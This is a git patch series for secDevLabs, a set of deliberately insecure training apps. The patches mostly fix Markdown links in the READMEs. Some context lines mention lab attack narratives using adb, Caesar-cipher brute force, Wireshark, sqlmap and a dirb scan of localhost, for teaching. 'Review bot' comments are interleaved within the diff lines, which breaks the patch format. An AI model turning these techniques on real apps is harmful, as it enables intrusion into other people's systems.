From cfc1b0afa48a00f6b3a676345b872a2350d4dc7b Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Tue, 11 Oct 2022 18:22:21 -0300 Subject: [PATCH 01/31] Update CONTRIBUTING.md Links fix-mitigation PR's #588 --- docs/CONTRIBUTING.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/docs/CONTRIBUTING.md b/docs/CONTRIBUTING.md index 3af595cc1..ef8164634 100644 --- a/docs/CONTRIBUTING.md +++ b/docs/CONTRIBUTING.md @@ -53,7 +53,7 @@ To build some of the secDevLabs apps, some third party code, such as libraries o [1]:/docs/Makefile [3]:/docs/README_Template.md -[4]:/docs/PR_Template.md -[5]:/docs/Issue_Template.md +[4]:https://github.com/globocom/secDevLabs/pulls +[5]:https://github.com/globocom/secDevLabs/issues [6]:https://docs.docker.com/compose/gettingstarted/ [7]:https://docs.docker.com/compose/compose-file/ From 399c2acc257445a342cc3c4ec01e3a2a78832f19 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Thu, 13 Oct 2022 17:44:33 -0300 Subject: [PATCH 02/31] Update README_Template.md --- docs/README_Template.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/docs/README_Template.md b/docs/README_Template.md index 242ac3d35..a7e219dcc 100644 --- a/docs/README_Template.md +++ b/docs/README_Template.md @@ -5,7 +5,7 @@ ( Be sure to add a banner image of your app here! )
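Review bot: in the `docs/CONTRIBUTING.md` hunk (@@ -53,7), `[4]` and `[5]` stop pointing at the repository's own `PR_Template.md` and `Issue_Template.md` and point at the live GitHub pull-request and issue lists instead. That changes what the two references mean rather than repairing a broken link, so either confirm the template files are really gone and adjust the sentence that cites `[4]`/`[5]`, or keep the template links and add the list URLs under new numbers.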

- +

( Here's a short description of your app! ) @@ -71,19 +71,19 @@ First time acessing the app: Found an interesting page:

- +

Started the analysis on how the app handles cookies:

- +

Confirmed the suspicion by having a look at the code!

- +

Add as many images as you can! A picture is worth more than a thousand words! @@ -104,13 +104,13 @@ Some good examples of images are as follows: Creating a payload:

- +

Delivering a payload, and results!

- +

## Secure this app From a82050f483a16a60ef3e72e2c6c9b58105f32aa2 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Thu, 13 Oct 2022 17:45:58 -0300 Subject: [PATCH 03/31] Update README_Template.md --- docs/README_Template.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/README_Template.md b/docs/README_Template.md index a7e219dcc..8223c0d3f 100644 --- a/docs/README_Template.md +++ b/docs/README_Template.md @@ -65,7 +65,7 @@ A nice example of images to have on an attack narrative in the discovery section First time acessing the app:

- +

Found an interesting page: From 5b6b5543a5307a0f769f033c00cc9b84dfa2d59d Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Thu, 13 Oct 2022 17:48:02 -0300 Subject: [PATCH 04/31] Update README_Template.md --- docs/README_Template.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/README_Template.md b/docs/README_Template.md index 8223c0d3f..6f4b69b35 100644 --- a/docs/README_Template.md +++ b/docs/README_Template.md @@ -127,7 +127,7 @@ How would you migitate this vulnerability? After your changes, an attacker shoul ## Contributing -We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 [secDevLabs]: https://github.com/globocom/secDevLabs [ExploitDB]: https://www.exploit-db.com/ From 90501488015665e739b160044c47db0748b31fad Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Thu, 13 Oct 2022 17:50:48 -0300 Subject: [PATCH 05/31] Update Dirb.md --- docs/Dirb.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/Dirb.md b/docs/Dirb.md index fc7910c28..35006a087 100644 --- a/docs/Dirb.md +++ b/docs/Dirb.md @@ -48,7 +48,7 @@ dirb http://localhost:5000 ./docs/common.txt ```
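Review bot: the `docs/README_Template.md` hunk (@@ -127,7) changes the Contributing link to `../docs/CONTRIBUTING.md`, which only resolves while the template sits in `docs/` itself. Every app README touched later in this series (for example `owasp-top10-2016-mobile/m2/cool_games/README.md`) keeps `../../../docs/CONTRIBUTING.md`, because that is the depth at which a copied template ends up, so the original `../../../docs/CONTRIBUTING.md` was the right value for a template and this change should be dropped.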
- +
Fig.1 - Dirb demonstration
From 31d7e88f0e986fde86e0b412d17fe495840ea12a Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Thu, 13 Oct 2022 17:52:44 -0300 Subject: [PATCH 06/31] Update Dirb.md --- docs/Dirb.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/Dirb.md b/docs/Dirb.md index 35006a087..4690475bb 100644 --- a/docs/Dirb.md +++ b/docs/Dirb.md @@ -48,7 +48,7 @@ dirb http://localhost:5000 ./docs/common.txt ```
- +
Fig.1 - Dirb demonstration
From a1eae562c344a8052f5cad7d982d79c2b7ac98aa Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 20:52:51 -0300 Subject: [PATCH 07/31] Update README.md --- owasp-top10-2016-mobile/m2/cool_games/README.md | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/owasp-top10-2016-mobile/m2/cool_games/README.md b/owasp-top10-2016-mobile/m2/cool_games/README.md index 812ab1316..a86d58707 100644 --- a/owasp-top10-2016-mobile/m2/cool_games/README.md +++ b/owasp-top10-2016-mobile/m2/cool_games/README.md @@ -4,7 +4,7 @@

-Cool Games is a Flutter powered mobile app that serves as the mobile version of [GamesIRADOS.com](https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a10/games-irados). It is built with a mobile front-end and a Golang powered back-end. +Cool Games is a Flutter powered mobile app that serves as the mobile version of [GamesIRADOS.com][GamesIRADOScom]. It is built with a mobile front-end and a Golang powered back-end. ## Index @@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insecure Data Storage** vulnerabil Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁 -To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands: +To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands: ### Start server commands: 
@@ -178,14 +178,18 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul ## PR solutions -[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22)! +[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]! ## Contributing We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 + +[GamesIRADOScom] : https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados +[secDevLabs] : https://github.com/globocom/secDevLabs [API-Version-Issue]: https://github.com/globocom/secDevLabs/blob/master/docs/api-version-issue.md [Flutter]: https://flutter.dev/docs/get-started/install [VS-Code-Flutter]: https://github.com/globocom/secDevLabs/blob/master/docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ [Docker Compose Install]: https://docs.docker.com/compose/install/ +[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22 \ No newline at end of file From fdab03babdf9d08a6b4000a91f3fefc272f14776 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 20:54:56 -0300 Subject: [PATCH 08/31] Update README.md --- owasp-top10-2016-mobile/m2/cool_games/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2016-mobile/m2/cool_games/README.md b/owasp-top10-2016-mobile/m2/cool_games/README.md index a86d58707..132be294a 100644 --- a/owasp-top10-2016-mobile/m2/cool_games/README.md +++ b/owasp-top10-2016-mobile/m2/cool_games/README.md 
@@ -185,8 +185,8 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 -[GamesIRADOScom] : https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados -[secDevLabs] : https://github.com/globocom/secDevLabs +[GamesIRADOS.com]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados +[secDevLabs]: https://github.com/globocom/secDevLabs [API-Version-Issue]: https://github.com/globocom/secDevLabs/blob/master/docs/api-version-issue.md [Flutter]: https://flutter.dev/docs/get-started/install [VS-Code-Flutter]: https://github.com/globocom/secDevLabs/blob/master/docs/installing-flutter.md From a59074ed117cac7ec2148aab7d02a155a8541333 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 20:57:17 -0300 Subject: [PATCH 09/31] Update README.md --- owasp-top10-2016-mobile/m2/cool_games/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/owasp-top10-2016-mobile/m2/cool_games/README.md b/owasp-top10-2016-mobile/m2/cool_games/README.md index 132be294a..a7950f42d 100644 --- a/owasp-top10-2016-mobile/m2/cool_games/README.md +++ b/owasp-top10-2016-mobile/m2/cool_games/README.md 
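Review bot: in the `cool_games/README.md` hunk (@@ -185,8) renaming the definition to `[GamesIRADOS.com]` breaks the reference `[GamesIRADOS.com][GamesIRADOScom]` introduced in PATCH 07, whose label is still `GamesIRADOScom`; PATCH 09 then renames it back. Patches 07, 08 and 09 are three attempts at one change and should be squashed into a single commit that adds `[GamesIRADOScom]: ...` and `[secDevLabs]: ...` correctly the first time.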
@@ -185,7 +185,7 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 -[GamesIRADOS.com]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados +[GamesIRADOScom]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados [secDevLabs]: https://github.com/globocom/secDevLabs [API-Version-Issue]: https://github.com/globocom/secDevLabs/blob/master/docs/api-version-issue.md [Flutter]: https://flutter.dev/docs/get-started/install From 990a45b985a4637f424ca2c874abd5e99bd4b54b Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 20:58:23 -0300 Subject: [PATCH 10/31] Update README.md --- owasp-top10-2016-mobile/m4/note-box/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2016-mobile/m4/note-box/README.md b/owasp-top10-2016-mobile/m4/note-box/README.md index 545dc9f86..8408cdee5 100644 --- a/owasp-top10-2016-mobile/m4/note-box/README.md +++ b/owasp-top10-2016-mobile/m4/note-box/README.md @@ -126,7 +126,7 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul ## PR solutions -[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM4-OWASP-2016+label%3A%22mitigation+solution+%F0%9F%94%92%22)! +[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]! ## Contributing 
@@ -136,3 +136,4 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [VS-Code-Flutter]: ../../../docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ [Docker Compose Install]: https://docs.docker.com/compose/install/ +[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22 \ No newline at end of file From d084ccb6502551e6ec86fc27f90bc6947f3977ec Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 20:59:36 -0300 Subject: [PATCH 11/31] Update README.md --- owasp-top10-2016-mobile/m4/note-box/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2016-mobile/m4/note-box/README.md b/owasp-top10-2016-mobile/m4/note-box/README.md index 8408cdee5..2f5d7a3f1 100644 --- a/owasp-top10-2016-mobile/m4/note-box/README.md +++ b/owasp-top10-2016-mobile/m4/note-box/README.md 
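Review bot: the `[these pull requests]` definition added in the `note-box/README.md` hunk (@@ -136,3) is a copy of the Cool Games one (`label%3AM2-OWASP-2016+label%3A%22Cool+Games%22`), but the inline link removed in the previous hunk filtered on `label%3AM4-OWASP-2016+label%3A%22mitigation+solution+%F0%9F%94%92%22`. As written, the Note Box README now sends readers to the Cool Games pull requests; the definition should carry the removed M4 query.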
@@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insecure Authentication** vulnerab Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁 -To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands: +To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands: ### Start server commands: @@ -132,6 +132,7 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[secDevLabs]: (https://github.com/globocom/secDevLabs) [Flutter]: https://flutter.dev/docs/get-started/install [VS-Code-Flutter]: ../../../docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ From 5f8ee75b83c16270d32efe37c7f987605c99145f Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:04:50 -0300 Subject: [PATCH 12/31] Update README.md --- owasp-top10-2016-mobile/m5/panda_zap/README.md | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/owasp-top10-2016-mobile/m5/panda_zap/README.md b/owasp-top10-2016-mobile/m5/panda_zap/README.md index 25043cb96..8fdd40ace 100644 
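Review bot: in the `note-box/README.md` hunk (@@ -132,6) the destination in `[secDevLabs]: (https://github.com/globocom/secDevLabs)` is wrapped in parentheses, and a balanced pair of parentheses is treated as part of the destination in a reference definition, so the link will point at `(https://github.com/globocom/secDevLabs)`; use `[secDevLabs]: https://github.com/globocom/secDevLabs` with no parentheses.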
--- a/owasp-top10-2016-mobile/m5/panda_zap/README.md +++ b/owasp-top10-2016-mobile/m5/panda_zap/README.md @@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insufficient Cryptography** vulner Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁 -To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands: +To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands: ### Start server commands: @@ -107,7 +107,7 @@ To enter the conversation, click the message bubble. After that, it's possible t ### 🔥 -If an attacker came into possession of the device and used the [Android Debug Bridge](https://developer.android.com/studio/command-line/adb) tool to communicate with it through a Unix shell, he could inspect how the app behaves and what it logs. +If an attacker came into possession of the device and used the [Android Debug Bridge][Android Debug Bridge] tool to communicate with it through a Unix shell, he could inspect how the app behaves and what it logs. To begin, it is possible to list connected devices with the following command: @@ -167,11 +167,11 @@ Having access to the app's log, it's possible to see that a certain key seems to

-Now in possession of the key and by having a look at the app's code, it's possible to see that a [Caesar Cipher](https://en.wikipedia.org/wiki/Caesar_cipher) encryption mechanism is being used. +Now in possession of the key and by having a look at the app's code, it's possible to see that a [Caesar Cipher][Caesar Cipher] encryption mechanism is being used. In cryptography, a Caesar cipher is an encryption technique in which each letter is shifted by a fixed number of positions down the alphabet. Even though we appear to have what seems to be the shift value, logged as being the `key`, due to the fact of limited letters in the alphabet (25 in English), the cipher can easily be broken in a brute force attack. -If an attacker were connected to the same network as someone using the app, it would be possible to capture and inspect the packets being transmitted using [Wireshark](https://www.wireshark.org/). To better narrow our search, we can filter for the port the app seems to be using, `11005`, as shown by the image below: +If an attacker were connected to the same network as someone using the app, it would be possible to capture and inspect the packets being transmitted using [Wireshark][Wireshark]. To better narrow our search, we can filter for the port the app seems to be using, `11005`, as shown by the image below:

@@ -198,7 +198,7 @@ How would you mitigate this vulnerability? After your changes, the app should no ## PR solutions -[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3A%22Panda+Zap%22+label%3AM5-OWASP-2016+label%3A%22mitigation+solution+%F0%9F%94%92%22)! +[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]! ## Contributing @@ -209,3 +209,8 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [VS-Code-Flutter]: https://github.com/globocom/secDevLabs/blob/master/docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ [Docker Compose Install]: https://docs.docker.com/compose/install/ +[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22 +[secDevLabs]: (https://github.com/globocom/secDevLabs) +[Android Debug Bridge]: https://developer.android.com/studio/command-line/adb +[Caesar Cipher]: https://en.wikipedia.org/wiki/Caesar_cipher +[Wireshark]: https://www.wireshark.org/) \ No newline at end of file From 63dd49e0ed93a5afe845c67d663fc4bbbe25ff24 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:06:03 -0300 Subject: [PATCH 13/31] Update README.md --- owasp-top10-2021-apps/a1/camplake-api/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a1/camplake-api/README.md b/owasp-top10-2021-apps/a1/camplake-api/README.md index 5349ae5b8..a7ba37b58 100644 --- a/owasp-top10-2021-apps/a1/camplake-api/README.md +++ b/owasp-top10-2021-apps/a1/camplake-api/README.md 
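Review bot: three of the five definitions added in the `panda_zap/README.md` hunk (@@ -209,3) are wrong. `[these pull requests]` reuses the Cool Games query (`M2-OWASP-2016` / `Cool+Games`) although the link removed in the @@ -198,7 hunk filtered on `%22Panda+Zap%22+label%3AM5-OWASP-2016+label%3A%22mitigation+solution+%F0%9F%94%92%22`; `[secDevLabs]` wraps its URL in parentheses, which end up inside the link target; and `[Wireshark]: https://www.wireshark.org/)` has a stray unbalanced `)`, which keeps the line from being a valid reference definition. The `[Android Debug Bridge]` and `[Caesar Cipher]` lines are fine.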
@@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a1/camp-lake-api @@ -123,4 +123,4 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [Docker Compose Install]: https://docs.docker.com/compose/install/ [App]: http://localhost:10005 [secDevLabs]: https://github.com/globocom/secDevLabs -[2]:https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a5/ecommerce-api \ No newline at end of file +[2]:https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a5/ecommerce-api From b8021d6369301e201a1825396050c1e9207491be Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:07:50 -0300 Subject: [PATCH 14/31] Update README.md --- owasp-top10-2021-apps/a1/ecommerce-api/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a1/ecommerce-api/README.md b/owasp-top10-2021-apps/a1/ecommerce-api/README.md index 76fc0655b..290b4ffce 100644 --- a/owasp-top10-2021-apps/a1/ecommerce-api/README.md +++ b/owasp-top10-2021-apps/a1/ecommerce-api/README.md 
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a1/ecommerce-api @@ -120,3 +120,4 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [app]: http://localhost:10005 [secdevlabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a5/ecommerce-api +[secDevLabs]: https://github.com/globocom/secDevLabs \ No newline at end of file From 38cdbdad31bee0053143455b39e2dc7896721eda Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:08:57 -0300 Subject: [PATCH 15/31] Update README.md --- owasp-top10-2021-apps/a1/tictactoe/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a1/tictactoe/README.md b/owasp-top10-2021-apps/a1/tictactoe/README.md index a47df86cc..1c438363d 100644 --- a/owasp-top10-2021-apps/a1/tictactoe/README.md +++ b/owasp-top10-2021-apps/a1/tictactoe/README.md 
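Review bot: the `[secDevLabs]: https://github.com/globocom/secDevLabs` line added in the `ecommerce-api/README.md` hunk (@@ -120,3) duplicates the existing `[secdevlabs]` definition two lines above: reference labels are matched case-insensitively, so `[secDevLabs][secDevLabs]` already resolves through the existing definition and the new line can be dropped (it also leaves the file without a trailing newline).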
@@ -21,7 +21,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh @@ -207,4 +207,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost.:10005 [secdevlabs]: https://github.com/globocom/secDevLabs +[secDevLabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a1/tictactoe From ce4243bfb12ac9ead1df9f3a714349485ac7c817 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:10:57 -0300 Subject: [PATCH 16/31] Update README.md --- owasp-top10-2021-apps/a2/snake-pro/README.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a2/snake-pro/README.md b/owasp-top10-2021-apps/a2/snake-pro/README.md index 7522e0344..8b3693212 100644 --- a/owasp-top10-2021-apps/a2/snake-pro/README.md +++ b/owasp-top10-2021-apps/a2/snake-pro/README.md 
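Review bot: as in ecommerce-api, the `tictactoe/README.md` hunk (@@ -207,4) adds `[secDevLabs]` next to an existing `[secdevlabs]` definition with the identical URL; since labels are case-insensitive the addition is redundant. While in this block, the context line `[app]: http://localhost.:10005` has a stray dot before the colon that is worth fixing in the same commit.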
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cryptographic Failure** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a2/snake-pro @@ -68,7 +68,7 @@ Additionally, the channel is being used by users to send their sensitive data is ### 🔥 -If the database is somehow exposed, all users' passwords will be leaked, as shown on these MongoDB documents. To view them, you can locally install [Robo 3T](https://robomongo.org/download) and use default credentials used in `config.yml`: +If the database is somehow exposed, all users' passwords will be leaked, as shown on these MongoDB documents. To view them, you can locally install [Robo 3T][Robo 3T] and use default credentials used in `config.yml`: ``` Database: snake_pro @@ -118,3 +118,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10003 [dirb]: https://tools.kali.org/web-applications/dirb +[Robo 3T]: https://robomongo.org/download +[secDevLabs]: https://github.com/globocom/secDevLabs + From e527b29066fda4f20ce4a5070e8697fa2d58dec2 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:14:12 -0300 Subject: [PATCH 17/31] Update README.md --- owasp-top10-2021-apps/a3/comment-killer/README.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) 
diff --git a/owasp-top10-2021-apps/a3/comment-killer/README.md b/owasp-top10-2021-apps/a3/comment-killer/README.md index 3db118056..5b48d6108 100644 --- a/owasp-top10-2021-apps/a3/comment-killer/README.md +++ b/owasp-top10-2021-apps/a3/comment-killer/README.md @@ -27,7 +27,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili ## Setup -To start this intentionally **insecure application**, you will need [Docker](https://docs.docker.com/get-docker/) and [Docker Compose](https://docs.docker.com/compose/install/). After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][Docker] and [Docker Compose][Docker Compose]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```bash cd secDevLabs/owasp-top10-2021-apps/a3/comment-killer @@ -96,7 +96,7 @@ func handler(c echo.Context) error { } ``` -In order to start the API, the following command can be used (you should check this [guide](https://golang.org/doc/install) if you need any help with Golang): +In order to start the API, the following command can be used (you should check this [guide][guide] if you need any help with Golang): ```sh go run main.go @@ -157,3 +157,7 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10007 +[Docker]: https://docs.docker.com/get-docker/ +[Docker Compose]: https://docs.docker.com/compose/install/ +[guide]: https://golang.org/doc/install +[secDevLabs]: https://github.com/globocom/secDevLabs From 74baa26a0627054fcedac0cb159c13fbd06c781c Mon Sep 17 00:00:00 2001 
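Review bot: the `comment-killer/README.md` hunk (@@ -157,3) adds `[Docker]` and `[Docker Compose]` alongside the existing `[docker install]` and `[docker compose install]` definitions, and `[Docker Compose]` carries exactly the same URL as `[docker compose install]`. Reuse the existing labels in the Setup sentence (`[Docker][docker install]`, `[Docker Compose][docker compose install]`), as the other READMEs in this series do, rather than maintaining two sets; the `[guide]` and `[secDevLabs]` additions are fine.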
From: FabioHCNobre Date: Wed, 19 Oct 2022 21:16:32 -0300 Subject: [PATCH 18/31] Update README.md --- owasp-top10-2021-apps/a3/copy-n-paste/README.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a3/copy-n-paste/README.md b/owasp-top10-2021-apps/a3/copy-n-paste/README.md index 6ef40a6bb..b16f9741b 100644 --- a/owasp-top10-2021-apps/a3/copy-n-paste/README.md +++ b/owasp-top10-2021-apps/a3/copy-n-paste/README.md @@ -21,7 +21,7 @@ The main goal of this project is to discuss how **SQL Injection** vulnerabilitie ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/copy-n-paste @@ -106,7 +106,7 @@ Request: #### 🔥 -An attacker could now create any malicious SQL queries and send them to the API that, in theory, would be executed. For this attack narrative, [sqlmap](https://github.com/sqlmapproject/sqlmap) will be used to exemplify how an automated SQL Injection attack may be performed. +An attacker could now create any malicious SQL queries and send them to the API that, in theory, would be executed. For this attack narrative, [sqlmap][sqlmap] will be used to exemplify how an automated SQL Injection attack may be performed. To install sqlmap on a Mac you can simply type: 
